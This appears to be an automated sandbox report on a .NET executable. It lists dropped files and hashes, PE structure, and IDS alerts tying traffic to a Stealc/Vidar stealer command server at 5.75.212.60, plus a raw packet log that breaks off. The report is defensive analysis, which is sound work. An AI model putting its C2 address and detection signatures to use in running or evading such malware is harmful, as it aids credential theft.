                                                                                      SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                      SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Joe Sandbox View:
                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                      • Filename: Bootstrapper.exe, Detection: malicious, Browse
                                                                                      • Filename: azeyNF3kkf.exe, Detection: malicious, Browse
                                                                                      • Filename: Setup .exe, Detection: malicious, Browse
                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                      • Filename: Nin6JE44ky.exe, Detection: malicious, Browse
                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):608080
                                                                                      Entropy (8bit):6.833616094889818
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                      MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                      SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                      SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                      SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Joe Sandbox View:
                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                      • Filename: Bootstrapper.exe, Detection: malicious, Browse
                                                                                      • Filename: azeyNF3kkf.exe, Detection: malicious, Browse
                                                                                      • Filename: Setup .exe, Detection: malicious, Browse
                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                      • Filename: Nin6JE44ky.exe, Detection: malicious, Browse
                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):450024
                                                                                      Entropy (8bit):6.673992339875127
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                      MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                      SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                      SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                      SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):2046288
                                                                                      Entropy (8bit):6.787733948558952
                                                                                      Encrypted:false
                                                                                      SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                      MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                      SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                      SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                      SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):257872
                                                                                      Entropy (8bit):6.727482641240852
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                      MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                      SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                      SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                      SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):80880
                                                                                      Entropy (8bit):6.920480786566406
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                      MD5:A37EE36B536409056A86F50E67777DD7
                                                                                      SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                      SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                      SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):522
                                                                                      Entropy (8bit):5.358731107079437
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:Q3La/hz92n4M9tDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:MLU84qpE4KlKDE4KhKiKhk
                                                                                      MD5:93E4C46884CB6EE7CDCC4AACE78CDFAC
                                                                                      SHA1:29B12D9409BA9AFE4C949F02F7D232233C0B5228
                                                                                      SHA-256:2690023A62F22AB7B27B09351205BA31173B50B77ACA89A5759EDF29A1FB17F7
                                                                                      SHA-512:E9C3E2FCEE4E13F7776665295A4F6085002913E011BEEF32C8E7065140937DDE1963182B547CC75110BF32AE5130A6686D5862076D5FFED9241F183B9217FA4D
                                                                                      Malicious:true
                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3070), with CRLF, LF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):34725
                                                                                      Entropy (8bit):5.399366384270716
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:/dpqm+0Ih3tAA9CWGVGfcDAJTBv++nIjBtPF5zfJkPVoEAdLTBv++nIjBtPF5x2A:/d8m+0Ih3tAA9CWGVGFJTBv++nIjBtPM
                                                                                      MD5:B2B09AFC6B2D5E26DB1CD4A772DED343
                                                                                      SHA1:02D5F08CCE04596AC9678C08C6ED38340793A399
                                                                                      SHA-256:2068F0E24F17277971C0253BE92F51B10434D517C24B807A5F3BF92BF335834F
                                                                                      SHA-512:A89D84CCB823021E16D9069394D294C8AEFC1E16EB166D63EE781DB2423B37B8DD576C5A032E57A24CE78458D1B550B0E090FD66768B7004C7803E27DA6CC7E4
                                                                                      Malicious:false
                                                                                      Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: gi_z2 https://5.75.212.60|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=_D2Bg4UEaFxK&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english" rel="stylesheet" type="text/css" >.<link href
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                      Category:dropped
                                                                                      Size (bytes):1835008
                                                                                      Entropy (8bit):4.466378053160432
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:HIXfpi67eLPU9skLmb0b4OWSPKaJG8nAgejZMMhA2gX4WABl0uNddwBCswSb+:oXD94OWlLZMM6YFH7++
                                                                                      MD5:761026465D86AAEC7AFDEFAF9E4980D2
                                                                                      SHA1:C20012E19A0D484E0431BCD3B967C94D8031A175
                                                                                      SHA-256:721E5282C547F74D17CFE2151AECCD85E1A6C22A1203301B12E2E93823922E37
                                                                                      SHA-512:2A4FF4179A88E621083C1271621CB7A2FF831E847752BD5B34EF365FC2A9807B9AFEC2D24620C3C7AA875D1382268CA859640D132C57076E340A04BFF795CED0
                                                                                      Malicious:false
                                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Entropy (8bit):7.233439891636296
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                                                                                      • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                      • Windows Screen Saver (13104/52) 0.07%
                                                                                      • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                      File name:file.exe
                                                                                      File size:6'581'760 bytes
                                                                                      MD5:4ea39e58d5185ea13c816062f97e001d
                                                                                      SHA1:4835b4fce547469ea200fc05f9bdfcfdc7572469
                                                                                      SHA256:1193d78ae12a46941717ff875f19ab33ce9f51f9c4ca3ef3b125abbc37560d62
                                                                                      SHA512:335997a137fb1c6d098f64743423b850a3937d24fb12e853aeb21e0fd2d2676cf1d38c1e4edd497cc485803efe5e79ec4f06799b11f3604234848019875f59c0
                                                                                      SSDEEP:98304:hr4lloZBIWWuOUG7B3bsOtzNy4ople5yjPWruqLa/:x4lyZaAG7B3jNdG4gPui
                                                                                      TLSH:BA66AE063250CB22C06E4633CADF842857FDEE107B53DA2B7D9AB35D65563A9090F2DE
                                                                                      Icon Hash:0b20282042e2e245
                                                                                      Entrypoint:0xa39a4e
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                      Time Stamp:0x66A21315 [Thu Jul 25 08:55:49 2024 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:4
                                                                                      OS Version Minor:0
                                                                                      File Version Major:4
                                                                                      File Version Minor:0
                                                                                      Subsystem Version Major:4
                                                                                      Subsystem Version Minor:0
                                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                      Instruction
                                                                                      jmp dword ptr [00402000h]
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x639a00 | 0x4b | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x63c000 | 0xe6b8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x64c000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x6399ac | 0x1c | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x637a54 | 0x637c00 | a747dfc55d7463dfdfc339c900dda157 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.sdata | 0x63a000 | 0x2ca | 0x400 | 70381d5d0defd5e396e895c4c996b608 | False | 0.5966796875 | data | 4.74641082995765 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x63c000 | 0xe6b8 | 0xe800 | ac6fe9214228fd9839de4d50c9d87a33 | False | 0.622002963362069 | data | 6.334964896630286 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x64c000 | 0xc | 0x200 | 2da5a7030dfa9fd1e09c672880cef8ab | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x63c1f0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 3779 x 3779 px/m | | | 0.6117021276595744
RT_ICON | 0x63c658 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3779 x 3779 px/m | | | 0.4174484052532833
RT_ICON | 0x63d700 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 3779 x 3779 px/m | | | 0.34221991701244814
RT_ICON | 0x63fca8 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 3779 x 3779 px/m | | | 0.310049598488427
RT_ICON | 0x643ed0 | 0x621c | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9955406911928651
RT_GROUP_ICON | 0x64a0ec | 0x4c | data | | | 0.8157894736842105
RT_VERSION | 0x64a138 | 0x394 | OpenPGP Secret Key | | | 0.4115720524017467
RT_MANIFEST | 0x64a4cc | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5469387755102041

DLL | Import
mscoree.dll | _CorExeMain

Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP
2024-07-26T03:17:58.166553+0200 | TCP | 2044247 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config | 443 | 49734 | 5.75.212.60 | 192.168.2.4
2024-07-26T03:18:12.224592+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49750 | 443 | 192.168.2.4 | 5.75.212.60
2024-07-26T03:18:10.501096+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49747 | 443 | 192.168.2.4 | 5.75.212.60
2024-07-26T03:18:01.301744+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49737 | 443 | 192.168.2.4 | 5.75.212.60
2024-07-26T03:18:19.621041+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49754 | 443 | 192.168.2.4 | 5.75.212.60
2024-07-26T03:18:47.150687+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49765 | 13.85.23.86 | 192.168.2.4
2024-07-26T03:17:53.826668+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49731 | 443 | 192.168.2.4 | 5.75.212.60
2024-07-26T03:17:59.522089+0200 | TCP | 2051831 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 | 443 | 49735 | 5.75.212.60 | 192.168.2.4
2024-07-26T03:18:00.297595+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49736 | 443 | 192.168.2.4 | 5.75.212.60
2024-07-26T03:18:04.383083+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49738 | 443 | 192.168.2.4 | 5.75.212.60
2024-07-26T03:18:09.045746+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49742 | 13.85.23.86 | 192.168.2.4
2024-07-26T03:17:59.521867+0200 | TCP | 2049087 | ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST | 49735 | 443 | 192.168.2.4 | 5.75.212.60
2024-07-26T03:18:16.550114+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49753 | 443 | 192.168.2.4 | 5.75.212.60
2024-07-26T03:17:58.862094+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49735 | 443 | 192.168.2.4 | 5.75.212.60
2024-07-26T03:18:27.420564+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49759 | 443 | 192.168.2.4 | 5.75.212.60
2024-07-26T03:17:57.520605+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49734 | 443 | 192.168.2.4 | 5.75.212.60
2024-07-26T03:18:28.739936+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49760 | 443 | 192.168.2.4 | 5.75.212.60
2024-07-26T03:18:25.674397+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49758 | 443 | 192.168.2.4 | 5.75.212.60
2024-07-26T03:17:54.918982+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49732 | 443 | 192.168.2.4 | 5.75.212.60
2024-07-26T03:18:06.522290+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49740 | 443 | 192.168.2.4 | 5.75.212.60
2024-07-26T03:18:22.203919+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49756 | 443 | 192.168.2.4 | 5.75.212.60
2024-07-26T03:18:13.800595+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49751 | 443 | 192.168.2.4 | 5.75.212.60
2024-07-26T03:18:23.573758+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49757 | 443 | 192.168.2.4 | 5.75.212.60
2024-07-26T03:18:08.725191+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49743 | 443 | 192.168.2.4 | 5.75.212.60
2024-07-26T03:17:56.842971+0200 | TCP | 2049087 | ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST | 49733 | 443 | 192.168.2.4 | 5.75.212.60
2024-07-26T03:18:15.242730+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49752 | 443 | 192.168.2.4 | 5.75.212.60
2024-07-26T03:17:56.215113+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49733 | 443 | 192.168.2.4 | 5.75.212.60
2024-07-26T03:18:05.490210+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49739 | 443 | 192.168.2.4 | 5.75.212.60
2024-07-26T03:18:07.652390+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49741 | 443 | 192.168.2.4 | 5.75.212.60
2024-07-26T03:18:11.361781+0200 | TCP | 2011803 | ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected | 443 | 49747 | 5.75.212.60 | 192.168.2.4
2024-07-26T03:18:20.847588+0200 | TCP | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 49755 | 443 | 192.168.2.4 | 5.75.212.60
2024-07-26T03:18:03.325570+0200 | TCP | 2011803 | ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected | 443 | 49737 | 5.75.212.60 | 192.168.2.4

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                      Jul 26, 2024 03:17:58.864325047 CEST49735443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:17:58.864337921 CEST443497355.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:17:59.521903992 CEST443497355.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:17:59.521997929 CEST443497355.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:17:59.522042036 CEST49735443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:17:59.522072077 CEST49735443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:17:59.522355080 CEST49735443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:17:59.522373915 CEST443497355.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:17:59.583719969 CEST49736443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:17:59.583775043 CEST443497365.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:17:59.583843946 CEST49736443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:17:59.584053040 CEST49736443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:17:59.584064007 CEST443497365.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:00.297411919 CEST443497365.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:00.297595024 CEST49736443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:00.298357964 CEST49736443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:00.298368931 CEST443497365.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:00.300046921 CEST49736443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:00.300057888 CEST443497365.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:00.300105095 CEST49736443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:00.300112963 CEST443497365.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:00.585923910 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:00.585969925 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:00.586076975 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:00.586342096 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:00.586352110 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:01.030513048 CEST443497365.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:01.030602932 CEST443497365.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:01.030648947 CEST49736443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:01.030687094 CEST49736443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:01.031639099 CEST49736443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:01.031660080 CEST443497365.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:01.301578045 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:01.301743984 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:01.302386045 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:01.302418947 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:01.304418087 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:01.304436922 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:01.743607044 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:01.743634939 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:01.743649960 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:01.743680954 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:01.743722916 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:01.743733883 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:01.743793011 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:01.774513006 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:01.774554014 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:01.774715900 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:01.774715900 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:01.774744987 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:01.774791956 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:01.841377974 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:01.841403961 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:01.841509104 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:01.841542006 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:01.841589928 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:01.871805906 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:01.871836901 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:01.871962070 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:01.871974945 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:01.872020006 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:01.912061930 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:01.912090063 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:01.912182093 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:01.912210941 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:01.912261009 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:01.936887980 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:01.936954021 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:01.936994076 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:01.937005043 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:01.937052965 CEST49737443192.168.2.45.75.212.60
